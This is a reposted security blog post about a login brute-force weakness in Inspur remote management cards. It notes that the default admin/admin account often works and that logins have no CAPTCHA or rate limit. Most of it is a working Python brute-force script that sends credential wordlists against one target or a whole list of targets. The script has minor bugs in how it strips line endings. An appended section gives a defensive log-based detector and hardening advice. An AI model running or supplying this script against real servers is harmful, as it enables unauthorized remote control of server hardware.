Inspur Remote Management Card Login Brute-Force Vulnerability (with Brute-Force Script)

颓废, 2019-05-19 08:40:27


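The Inspur remote management card is a web service, hosted on a card plugged into the server, that lets operations staff and server administrators control the server remotely. It serves HTTP on port 80. After logging in, you can remotely control and manage the server hardware: for example, monitor performance metrics such as CPU and memory, remotely start and shut down virtual machines on the server, or even use the card as a jump host for controlling virtual hosts.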


Brute force succeeded


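You can try logging in to the Inspur remote management card with admin/admin, and there is a good chance it will work. In addition, the card's login has no CAPTCHA and no limit on the frequency of attempts, so login brute forcing with Burp Suite is easy.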


Below is a script written by an expert:

#!/usr/bin/env python
# -*- coding:utf-8 -*-

#import lib files
import os
import sys
import logging
import requests
from optparse import OptionParser

#global configuration set
reload(sys)
sys.setdefaultencoding("utf-8")
logging.basicConfig(format='%(asctime)s-%(message)s',datefmt='%Y-%m-%d %H:%M:%S %p',level=logging.INFO)

#global varites defines
HEADER = {
    "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0",
    "Accept":"application/json, text/plain, */*",
    "Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding":"gzip, deflate",
    "Content-Type":"application/json;charset=utf-8"
}
SUCCESS_FLAG = "SESSION_COOKIE"
USERNAME_LIST = ["admin"]
PASSWORD_LIST = ["admin"]

#global functions defines
def config_read_from_file(userfile,pswdfile):
    global USERNAME_LIST
    global PASSWORD_LIST
    logging.info("[+] Read Configuration From File ...")
    try:
        with open(userfile,"r") as fr:
            for line in fr.readlines():
                line = line.split("/n")[0].split("/r")[0]
                USERNAME_LIST.append(line)
    except Exception,ex:
        logstr = "[-] Configuration Read From File Failed! Reason:%s"%str(ex)
        logging.error(logstr)
        logging.info("[+] Use Default Dict!")
    try:
        with open(pswdfile,"r") as fr:
            for line in fr.readlines():
                line = line.split("/n")[0].split("/r")[0]
                PASSWORD_LIST.append(line)
    except Exception,ex:
        logstr = "[-] Configuration Read From File Failed! Reason:%s"%str(ex)
        logging.error(logstr)
        logging.info("[+] Use Default Dict!")
    return 0

def login_packet_send(target,username,password):
    login_data = {"WEBVAR_USERNAME":username,"WEBVAR_PASSWORD":password}
    try:
        response = requests.post("http://%s/rpc/WEBSES/create.asp"%str(target),headers=HEADER,data=login_data,timeout=5)
    except Exception,ex:
        logstr = "[-] Connect Failed Reason:%s"%str(ex)
        logging.error(logstr)
        return -1
    if response.status_code != 200:
        return -1
    else:
        return response.content

def vuln_check(content):
    if content.find(SUCCESS_FLAG) >= 0 and content.find("Failure_Login_IPMI_Then_LDAP_then_Active_Directory_Radius") < 0:
        return 0
    else:
        return -1

def crack(target,username,password):
    content = login_packet_send(target,username,password)
    if content != -1:
        if vuln_check(content) == 0:
            logging.info("[*] Crack %s Success! Username:%s,Password:%s"%(str(target),str(username),str(password)))
            return 0
    return -1

def scan(target,targettype):
    targetlist = []
    if targettype == 1:
        try:
            with open(target,"r") as fr:
                for line in fr.readlines():
                    line = line.split("/n")[0].split("/r")[0].replace(" ","")
                    targetlist.append(line)
        except Exception,ex:
            pass
    else:
        targetlist = [target]
    if len(target) > 0:
        for item in targetlist:
            for user in USERNAME_LIST:
                for pswd in PASSWORD_LIST:
                    crack(item,user,pswd)

#main function -- programme
if __name__ == "__main__":

    parser = OptionParser()
    parser.add_option("-t", "--target", dest="target",help="target to check")
    parser.add_option("-f", "--filename", dest="targetfile",help="targetfiel to check")
    parser.add_option("-u", "--userfile", dest="userfile",help="username dict")
    parser.add_option("-p", "--pswdfile", dest="pswdfile",help="password dict")
    (options, args) = parser.parse_args()
    config_read_from_file(options.userfile,options.pswdfile)
    if options.target not in ["",None," "]:
        scan(options.target,0)
    elif options.targetfile not in ["",None," "]:
        scan(options.targetfile,1)

Original article: http://www.cnblogs.com/KevinGeorge/p/8358456.html
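
Detection side, as an added example that is not part of the original post or of the script author's code: because the login has no CAPTCHA and no rate limit, a burst of POSTs to the login endpoint from one source is the signal to alert on. It assumes the card sits behind a reverse proxy that writes combined-format access logs in chronological order; the log lines, IP addresses, and thresholds are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGIN_PATH = "/rpc/WEBSES/create.asp"  # login endpoint named in the script on this page
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# Assumed combined log format: ip - - [timestamp] "METHOD path PROTO" status size
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" \d{3}')

def find_bruteforce(lines, max_attempts=5, window=timedelta(seconds=60)):
    """Return {source_ip: peak_count} for sources that sent more than
    max_attempts login POSTs inside any sliding window.
    Attempts are counted, not failures: the script above decides success from
    the response body, so the HTTP status is not treated as a signal here."""
    recent = defaultdict(deque)  # ip -> timestamps still inside the window
    peaks = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if m["path"].split("?", 1)[0] != LOGIN_PATH:
            continue
        ts = datetime.strptime(m["ts"], TS_FMT)
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window:  # drop attempts older than the window
            q.popleft()
        if len(q) > max_attempts:
            peaks[m["ip"]] = max(peaks.get(m["ip"], 0), len(q))
    return peaks

def build_sample():
    """Constructed log: 8 rapid logins from 192.0.2.10, 2 slow ones from 198.51.100.7."""
    fmt = '{ip} - - [{ts}] "POST {path} HTTP/1.1" 200 312'
    base = datetime.strptime("19/May/2019:08:40:00 +0800", TS_FMT)
    rows = [(base + timedelta(seconds=2 * i), "192.0.2.10") for i in range(8)]
    rows += [(base + timedelta(minutes=10 * i), "198.51.100.7") for i in range(2)]
    rows.sort()
    lines = [fmt.format(ip=ip, ts=t.strftime(TS_FMT), path=LOGIN_PATH) for t, ip in rows]
    lines.append('192.0.2.10 - - [19/May/2019:08:51:00 +0800] "GET /index.html HTTP/1.1" 200 1024')
    return lines

if __name__ == "__main__":
    for ip, n in find_bruteforce(build_sample()).items():
        print(f"{ip}: {n} login POSTs within 60 seconds")
```

The same threshold can be enforced as a rate limit at the proxy, alongside replacing the default admin/admin account and keeping the card's port 80 off untrusted networks.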

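  • When reposting, please keep the link to this article (CN-SEC中文网: thanks to the original author for the hard work):
                   Inspur Remote Management Card Login Brute-Force Vulnerability (with Brute-Force Script) http://cn-sec.com/archives/67729.html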
